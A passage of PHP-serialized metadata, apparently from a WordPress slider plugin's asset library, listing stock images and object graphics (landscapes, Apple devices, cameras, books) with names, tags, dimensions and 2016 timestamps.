14:29:46\";s:6:\"active\";s:1:\"1\";}i:91;a:13:{s:2:\"id\";s:2:\"91\";s:4:\"type\";s:1:\"2\";s:6:\"handle\";s:17:\"mountain_view.jpg\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:13:\"Mountain View\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:2:\"22\";s:6:\"handle\";s:3:\"Sky\";s:4:\"name\";s:3:\"Sky\";}i:1;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1160\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-15 14:29:46\";s:6:\"active\";s:1:\"1\";}i:90;a:13:{s:2:\"id\";s:2:\"90\";s:4:\"type\";s:1:\"2\";s:6:\"handle\";s:19:\"rocky_landscape.jpg\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:15:\"Rocky Landscape\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:2:\"22\";s:6:\"handle\";s:3:\"Sky\";s:4:\"name\";s:3:\"Sky\";}i:1;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1080\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-15 14:29:46\";s:6:\"active\";s:1:\"1\";}i:89;a:13:{s:2:\"id\";s:2:\"89\";s:4:\"type\";s:1:\"2\";s:6:\"handle\";s:19:\"mountain_view_4.jpg\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:15:\"Mountain View 4\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:2:\"22\";s:6:\"handle\";s:3:\"Sky\";s:4:\"name\";s:3:\"Sky\";}i:1;a:3:{s:2:\"id\";s:2:\"19\";s:6:\"handle\";s:6:\"nature\";s:4:\"name\";s:6:\"Nature\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1920\";s:6:\"height\";s:4:\"1203\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-15 14:29:46\";s:6:\"active\";s:1:\"1\";}i:88;a:13:{s:2:\"id\";s:2:\"88\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:24:\"object_eiffeltower_2.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:13:\"Eiffeltower 2\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:2:\"18\";s:6:\"handle\";s:4:\"misc\";s:4:\"name\";s:4:\"Misc\";}i:1;a:3:{s:2:\"id\";s:1:\"1\";s:6:\"handle\";s:11:\"accessories\";s:4:\"name\";s:11:\"Accessories\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:3:\"700\";s:6:\"height\";s:3:\"700\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";}i:87;a:13:{s:2:\"id\";s:2:\"87\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:21:\"object_notebook_1.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:11:\"Notebook PC\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"2000\";s:6:\"height\";s:4:\"2000\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";}i:86;a:13:{s:2:\"id\";s:2:\"86\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:20:\"object_macbook_1.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:20:\"Apple Macbook Silver\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"2000\";s:6:\"height\";s:4:\"2000\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";}i:85;a:13:{s:2:\"id\";s:2:\"85\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:18:\"object_canon_2.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:21:\"Canon Camera DSLR Top\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"5\";s:6:\"handle\";s:3:\"art\";s:4:\"name\";s:3:\"Art\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";}i:84;a:13:{s:2:\"id\";s:2:\"84\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:19:\"object_iphone_3.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:25:\"Apple iPhone Silver White\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";}i:83;a:13:{s:2:\"id\";s:2:\"83\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:18:\"object_candy_2.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:15:\"Candy Colored 2\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:3:\"800\";s:6:\"height\";s:3:\"800\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";}i:82;a:13:{s:2:\"id\";s:2:\"82\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:21:\"object_macmouse_1.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:15:\"Apple Mac Mouse\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1000\";s:6:\"height\";s:4:\"1000\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";}i:81;a:13:{s:2:\"id\";s:2:\"81\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:19:\"object_iphone_1.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:18:\"Apple iPhone Black\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";}i:80;a:13:{s:2:\"id\";s:2:\"80\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:17:\"object_deco_1.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:17:\"White Deco Object\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:2:\"18\";s:6:\"handle\";s:4:\"misc\";s:4:\"name\";s:4:\"Misc\";}i:1;a:3:{s:2:\"id\";s:1:\"1\";s:6:\"handle\";s:11:\"accessories\";s:4:\"name\";s:11:\"Accessories\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:3:\"800\";s:6:\"height\";s:3:\"800\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";}i:79;a:13:{s:2:\"id\";s:2:\"79\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:23:\"object_applewatch_1.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:24:\"Apple Watch White Silver\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:3:\"800\";s:6:\"height\";s:3:\"800\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";}i:78;a:13:{s:2:\"id\";s:2:\"78\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:23:\"object_swissknife_1.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:11:\"Swiss Knife\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:2:\"18\";s:6:\"handle\";s:4:\"misc\";s:4:\"name\";s:4:\"Misc\";}i:1;a:3:{s:2:\"id\";s:1:\"1\";s:6:\"handle\";s:11:\"accessories\";s:4:\"name\";s:11:\"Accessories\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:3:\"800\";s:6:\"height\";s:3:\"800\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";}i:77;a:13:{s:2:\"id\";s:2:\"77\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:23:\"object_applewatch_2.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:17:\"Apple Watch Black\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:3:\"800\";s:6:\"height\";s:3:\"800\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";}i:76;a:13:{s:2:\"id\";s:2:\"76\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:18:\"object_candy_1.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:13:\"Candy Colored\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:3:\"800\";s:6:\"height\";s:3:\"800\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";}i:75;a:13:{s:2:\"id\";s:2:\"75\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:17:\"object_ipad_1.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:16:\"Apple iPad Black\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"2000\";s:6:\"height\";s:4:\"2000\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";}i:74;a:13:{s:2:\"id\";s:2:\"74\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:17:\"object_lamp_2.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:15:\"Black Desk Lamp\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";}i:73;a:13:{s:2:\"id\";s:2:\"73\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:18:\"object_canon_1.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:17:\"Canon Camera DLSR\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"5\";s:6:\"handle\";s:3:\"art\";s:4:\"name\";s:3:\"Art\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";}i:72;a:13:{s:2:\"id\";s:2:\"72\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:23:\"object_blackberry_2.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:12:\"Blackberry 3\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1000\";s:6:\"height\";s:4:\"1000\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";}i:71;a:13:{s:2:\"id\";s:2:\"71\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:19:\"object_iphone_2.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:19:\"Apple iPhone Silver\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";}i:70;a:13:{s:2:\"id\";s:2:\"70\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:17:\"object_ipad_2.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:15:\"Apple iPad Gold\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"2000\";s:6:\"height\";s:4:\"2000\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";}i:69;a:13:{s:2:\"id\";s:2:\"69\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:20:\"object_printer_1.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:7:\"Printer\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";}i:68;a:13:{s:2:\"id\";s:2:\"68\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:20:\"object_pcmouse_1.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:14:\"Black PC Mouse\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1000\";s:6:\"height\";s:4:\"1000\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";}i:67;a:13:{s:2:\"id\";s:2:\"67\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:17:\"object_ipad_3.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:17:\"Apple iPad Silver\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"2000\";s:6:\"height\";s:4:\"2000\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";}i:66;a:13:{s:2:\"id\";s:2:\"66\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:17:\"object_lamp_1.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:13:\"Desk Lamp Top\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";}i:65;a:13:{s:2:\"id\";s:2:\"65\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:22:\"object_macscreen_1.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:16:\"Apple Mac Screen\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"2000\";s:6:\"height\";s:4:\"2000\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";}i:64;a:13:{s:2:\"id\";s:2:\"64\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:23:\"object_blackberry_3.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:12:\"Blackberry 2\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1000\";s:6:\"height\";s:4:\"1000\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";}i:63;a:13:{s:2:\"id\";s:2:\"63\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:23:\"object_applewatch_3.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:16:\"Apple Watch Gold\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:3:\"800\";s:6:\"height\";s:3:\"800\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";}i:62;a:13:{s:2:\"id\";s:2:\"62\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:23:\"object_blackberry_1.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:10:\"Blackberry\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"2\";s:6:\"handle\";s:6:\"device\";s:4:\"name\";s:6:\"Device\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1000\";s:6:\"height\";s:4:\"1000\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-12 16:51:11\";s:6:\"active\";s:1:\"1\";}i:49;a:13:{s:2:\"id\";s:2:\"49\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:19:\"object_bottle_1.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:18:\"Brown Glass Bottle\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:2:\"18\";s:6:\"handle\";s:4:\"misc\";s:4:\"name\";s:4:\"Misc\";}i:1;a:3:{s:2:\"id\";s:2:\"16\";s:6:\"handle\";s:4:\"food\";s:4:\"name\";s:4:\"Food\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-12 12:57:32\";s:6:\"active\";s:1:\"1\";}i:48;a:13:{s:2:\"id\";s:2:\"48\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:20:\"object_glasses_1.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:19:\"Hipster Glasses Top\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"1\";s:6:\"handle\";s:11:\"accessories\";s:4:\"name\";s:11:\"Accessories\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1000\";s:6:\"height\";s:4:\"1000\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-12 12:57:32\";s:6:\"active\";s:1:\"1\";}i:47;a:13:{s:2:\"id\";s:2:\"47\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:21:\"object_magazine_1.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:14:\"Blank Magazine\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-12 12:57:32\";s:6:\"active\";s:1:\"1\";}i:46;a:13:{s:2:\"id\";s:2:\"46\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:28:\"object_leatherdocument_2.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:24:\"Black Leather Document 2\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}i:1;a:3:{s:2:\"id\";s:1:\"1\";s:6:\"handle\";s:11:\"accessories\";s:4:\"name\";s:11:\"Accessories\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-12 12:57:32\";s:6:\"active\";s:1:\"1\";}i:45;a:13:{s:2:\"id\";s:2:\"45\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:18:\"object_purse_2.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:13:\"Black Purse 2\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"1\";s:6:\"handle\";s:11:\"accessories\";s:4:\"name\";s:11:\"Accessories\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-12 12:57:32\";s:6:\"active\";s:1:\"1\";}i:44;a:13:{s:2:\"id\";s:2:\"44\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:23:\"object_typewriter_1.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:18:\"Retro Typewriter 2\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-12 12:57:32\";s:6:\"active\";s:1:\"1\";}i:43;a:13:{s:2:\"id\";s:2:\"43\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:17:\"object_book_5.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:9:\"Old Books\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-12 12:57:32\";s:6:\"active\";s:1:\"1\";}i:42;a:13:{s:2:\"id\";s:2:\"42\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:28:\"object_leatherdocument_1.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:29:\"Black Leather Document Closed\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1600\";s:6:\"height\";s:4:\"1600\";s:14:\"plugin_version\";s:0:\"\";s:7:\"version\";s:3:\"1.0\";s:5:\"added\";s:19:\"2016-08-12 12:57:32\";s:6:\"active\";s:1:\"1\";}i:41;a:13:{s:2:\"id\";s:2:\"41\";s:4:\"type\";s:1:\"1\";s:6:\"handle\";s:17:\"object_book_4.png\";s:4:\"data\";s:0:\"\";s:4:\"name\";s:8:\"Old Book\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New 